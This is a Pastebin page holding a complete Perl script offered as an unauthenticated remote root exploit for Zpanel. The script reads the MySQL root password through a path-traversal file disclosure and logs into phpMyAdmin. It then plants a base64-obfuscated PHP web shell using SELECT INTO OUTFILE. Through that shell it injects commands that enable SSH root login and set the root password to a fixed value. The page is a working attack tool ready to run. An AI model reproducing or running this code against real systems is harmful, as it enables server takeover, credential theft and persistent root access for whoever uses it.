Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- #********************************************************************************
- #
- #
- # Unauthenticated Zpanel Remote Root Exploit
- # japp@0xlabs.com
- # http://www.0xlabs.com
- #
- #
- #********************************************************************************
- use LWP::UserAgent;
- $FILE_DISCLOSURE = "etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php";
- $PMA_PATH = "etc/apps/phpmyadmin/index.php";
- $PMA_DOCROOT = "etc/apps/phpmyadmin/import.php";
- print "\n\n";
- print "\t================================\n";
- print "\t[ Zpanel Remote Root Exploit ]\n";
- print "\t[ By japp\@0xlabs.com ]\n";
- print "\t[ www.0xlabs.com ]\n";
- print "\t================================\n\n";
- my $argc = @ARGV;
- if ( $argc != 1 )
- {
- print " [*] Usage: ".$0." <http://localhost/zpanel/>\n";
- exit 1;
- }
- my $ua = http_handler();
- my $url = $ARGV[0];
- if ( $url !~ /^http/ ){ $url = "http://".$url; }
- if ( $url !~ /\/$/ ) { $url .= "/"; }
- print " [*] Trying to get MySQL root password...\n";
- my $root_pass = GetPasswd ($url, $ua);
- print " [+] Mysql root password: ".$root_pass."\n";
- print " [*] Trying to access through phpMyAdmin...\n";
- my $token = AccessPma ($root_pass, $url, $ua);
- print " [+] Login successfully\n";
- print " [*] Getting Zpanel document root...\n";
- my $docroot = GetDocRoot ($token, $url, $ua);
- print " [+] Zpanel document root: ".$docroot."\n";
- print " [*] Uploading shell...\n";
- UploadShell ($token, $docroot, $url, $ua);
- print " [+] Shell uploaded successfully!\n";
- print " [+] Enabling SSH root login\n";
- EnableRoot ($url, $ua);
- print " [*] Changing root password...\n";
- ChangePasswd ($url, $ua);
- print " [+] Root password changed\n\n";
- print " [!] Now you can login through SSH. Root password is '0xlabs'\n\n";
- sub ChangePasswd
- {
- my $url = $_[0];
- my $ua = $_[1];
- my $rsp = $ua->get ($url."0xlabs.php?c=cd bin;./zsudo \"root:0xlabs\'\" \"|/usr/sbin/chpasswd;%23\"");
- }
- sub EnableRoot
- {
- my $url = $_[0];
- my $ua = $_[1];
- my $rsp = $ua->get ($url."0xlabs.php?c=cd bin;./zsudo \"\';sed -i \'s-PermitRootLogin no-PermitRootLogin yes-g\'\" \"/etc/ssh/*hd_config %23\"");
- }
- sub UploadShell
- {
- my $token = $_[0];
- my $docroot = $_[1];
- my $url = $_[2];
- my $ua = $_[3];
- my %pdata;
- $pdata{"token"} = $token;
- $pdata{"sql_query"} = "SELECT '<?php eval(base64_decode(\"cGFzc3RocnUoJF9HRVRbImMiXSk7\"));?>' INTO OUTFILE '".$docroot."0xlabs.php'";
- $pdata{"ajax_request"} = "true";
- http_post ($url.$PMA_DOCROOT, $ua, %pdata);
- my $rsp = $ua->get ($url."0xlabs.php?c=echo 0xlabs_rulz");
- if (!$rsp->is_success)
- {
- die (" [-] Can't locate uploaded shell at '".$url."0xlabs.php'\n");
- }
- my $cont = $rsp->content;
- if ( $cont !~ /0xlabs_rulz/ )
- {
- die (" [-] Can't validate uploaded shell. Check manually: ".$url."0xlabs.php?c=dir\n");
- }
- }
- sub GetDocRoot
- {
- my $token = $_[0];
- my $url = $_[1];
- my $ua = $_[2];
- my %pdata;
- $pdata{"token"} = $token;
- $pdata{"sql_query"} = "SELECT so_value_tx FROM zpanel_core.x_settings WHERE so_name_vc='zpanel_root'";
- $pdata{"ajax_request"} = "true";
- my $cont = http_post ($url.$PMA_DOCROOT, $ua, %pdata);
- $cont =~ /class=\"data grid_edit\s*">([^<]+)<\/td>/;
- return $1;
- }
- sub AccessPma
- {
- my $root_pass = $_[0];
- my $url = $_[1];
- my $ua = $_[2];
- my %pdata;
- my $rsp = $ua->get ($url.$PMA_PATH);
- if (!$rsp->is_success) {
- die (" [-] Can't access to phpMyAdmin at '".$url.$PMA_PATH."'\n");
- }
- my $cont = $rsp->content;
- $cont =~ /name=\"token\" value=\"(.+)\"/;
- my $token = $1;
- $pdata{"pma_username"} = "root";
- $pdata{"pma_password"} = $root_pass;
- $pdata{"server"} = "1";
- $pdata{"lang"} = "en";
- $pdata{"collation_connection"} = "utf8_general_ci";
- $pdata{"token"} = $token;
- $cont = http_post ($url.$PMA_PATH, $ua, %pdata);
- if ( $cont =~ /Cannot log in to the MySQL server/ )
- {
- die (" [-] Cannot log in to phpMyAdmin\n");
- }
- $cont =~ /\?token=(.+)\"/;
- return $1;
- }
- sub GetPasswd
- {
- my $url = $_[0];
- my $ua = $_[1];
- my $rsp = $ua->get ($url.$FILE_DISCLOSURE);
- if (!$rsp->is_success) {
- die (" [-] Can't get '".$url."'. Check URL.\n");
- }
- my $cont = $rsp->content;
- if ( $cont !~ /root/ )
- {
- die (" [-] Can't get root password. Patched?\n");
- }
- my $flag = 0;
- while ( $cont =~ /#DD0000\">[\'\"]+([^\"^\']+)[\'\"]+/g )
- {
- $flag++;
- if ( $flag == 4 )
- {
- return $1;
- }
- }
- }
- sub http_post
- {
- my ($host, $ua, %data) = @_;
- my $rsp = $ua->post ($host, [%data]);
- return ($rsp->content);
- }
- sub http_handler
- {
- my $newhandler = LWP::UserAgent->new() or return -1;
- $newhandler->agent ("Mozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6");
- $newhandler->timeout(10);
- $newhandler->protocols_allowed(['http','https']);
- $newhandler->cookie_jar( {} );
- push @{ $newhandler->requests_redirectable }, 'GET';
- push @{ $newhandler->requests_redirectable }, 'POST';
- return $newhandler;
- }
Add Comment
Please, Sign In to add comment